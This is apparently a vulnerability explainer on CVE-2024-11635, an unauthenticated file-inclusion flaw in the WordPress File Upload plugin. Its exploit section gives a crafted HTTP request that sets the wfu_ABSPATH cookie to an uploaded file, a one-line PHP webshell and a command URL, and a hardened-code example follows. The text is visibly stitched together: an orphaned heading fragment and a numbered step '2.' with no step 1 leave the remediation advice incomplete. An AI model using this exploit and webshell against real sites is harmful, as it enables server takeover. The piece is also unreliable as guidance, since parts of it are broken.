CVE-2024-11635 is a serious security vulnerability in the popular WordPress File Upload plugin, affecting all versions up to and including 4.24.12. Attackers can exploit this bug to run any code they want on your server—without needing to log in. Here is an exclusive, plain-language breakdown of what happened, how it works, and what you should do.

What Is the WordPress File Upload Plugin?

WordPress File Upload is a widely used plugin that lets visitors upload files to a WordPress website. It's installed on over 50,000 sites and is trusted for its simplicity.

What Is CVE-2024-11635?

CVE-2024-11635 is a Remote Code Execution (RCE) bug. This means an attacker can upload and execute dangerous files on your server. This risk applies if you’re using any version up to, and including, 4.24.12. The bug stems from the plugin trusting a cookie parameter called wfu_ABSPATH, a value that should never have been user-controllable.

How Does the Vulnerability Work?

The plugin reads the value of the cookie named wfu_ABSPATH in some of its file-handling code. It uses this value as an absolute file path—without enough security checks. That means anyone can set this cookie to *any* path on the server. Worse, the plugin just includes files from the user-provided path, letting an attacker execute their own PHP code.

Why Is This So Bad?

This is a classic example of an arbitrary file inclusion vulnerability. By sending a request with a crafted cookie, the attacker makes the plugin include, and therefore execute, a PHP file of their choosing.

Example Exploit

> Warning: This information is provided for educational and defensive purposes only.

Let’s walk through how an attacker might use this vulnerability. Suppose they craft a malicious PHP script and use another vulnerability (or open file upload feature) to place it somewhere on the web server, such as /tmp/shell.php.

The attacker would then send an HTTP request to the vulnerable site—*no login required*—like this:

```http
GET /wp-content/plugins/wordpress-file-upload/wordpress_file_upload.php HTTP/1.1
Host: victim.com
Cookie: wfu_ABSPATH=/tmp/shell.php
```

What happens?
The plugin’s code reads the cookie and tries to include /tmp/shell.php, executing whatever PHP code is inside that file—now running as the web server!

A simple webshell could be as short as

```php
<?php system($_GET['cmd']); ?>
```

The attacker uploads this as /tmp/shell.php and then browses to

http://victim.com/wp-content/plugins/wordpress-file-upload/wordpress_file_upload.php?cmd=whoami

While the actual vulnerable code may be more complex, it works roughly like this (simplified):

```php
// Simplified illustration of the flaw: the cookie value is taken verbatim
// and handed to include() with no validation at all.
if (isset($_COOKIE['wfu_ABSPATH'])) {
    $abspath = $_COOKIE['wfu_ABSPATH']; // attacker-controlled request header
    include($abspath); // Danger: user input controls which file is included
}
```
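For contrast, here is a hardened way to handle the same need, written as an added example and not taken from the plugin: the install root comes from the WordPress ABSPATH constant (assumed to be defined, as it is once wp-load.php has run), the cookie is never consulted, and the file to include is restricted to a fixed basename that must resolve under that root. The function names are hypothetical.

```php
<?php
// Added example (not the plugin's own code). Assumes ABSPATH is defined by
// WordPress; function names are hypothetical.

/**
 * Return the canonical install root, or null if it cannot be trusted.
 */
function wfu_example_trusted_root(): ?string {
    if (!defined('ABSPATH')) {
        return null;                 // not running inside WordPress
    }
    $root = realpath(ABSPATH);       // collapses "..", "." and symlinks
    return ($root === false) ? null : rtrim($root, DIRECTORY_SEPARATOR);
}

/**
 * Include $file only if it is a plain basename (no directory parts) that
 * resolves to an existing .php file directly under the trusted root.
 * Returns false, without including anything, when any check fails.
 */
function wfu_example_safe_include(string $file): bool {
    $root = wfu_example_trusted_root();
    if ($root === null || $file === '' || $file !== basename($file)) {
        return false;                // no root, or $file carried a path
    }
    $target = realpath($root . DIRECTORY_SEPARATOR . $file);
    // After realpath() a prefix check against $root is meaningful: a value
    // such as "../../tmp/shell.php" can no longer point outside the root.
    if ($target === false || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    if (!is_file($target) || pathinfo($target, PATHINFO_EXTENSION) !== 'php') {
        return false;
    }
    include $target;
    return true;
}

// The request-supplied cookie is deliberately never read. If a deployment
// genuinely needs a configurable root, it belongs in wp-config.php or in an
// option written by an administrator, not in a request header.
```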

Sites that allow file uploads or have another way for an attacker to drop files

Note: This attack does *not* require a WordPress user account.

2. Check your server for suspicious files

- Look in /tmp/, /uploads/, or any writable directories for unknown .php files.

Conclusion

CVE-2024-11635 is a critical bug affecting a hugely popular WordPress plugin. It allows anyone to execute code on your server, potentially compromising your entire website. The vulnerability is easy to exploit and should be addressed by updating immediately. Stay secure!
*For more details about WordPress security, consider regular reviews of your plugin inventory and always keep up with responsible vulnerability disclosures.*

Timeline

Published on: 01/08/2025 08:15:24 UTC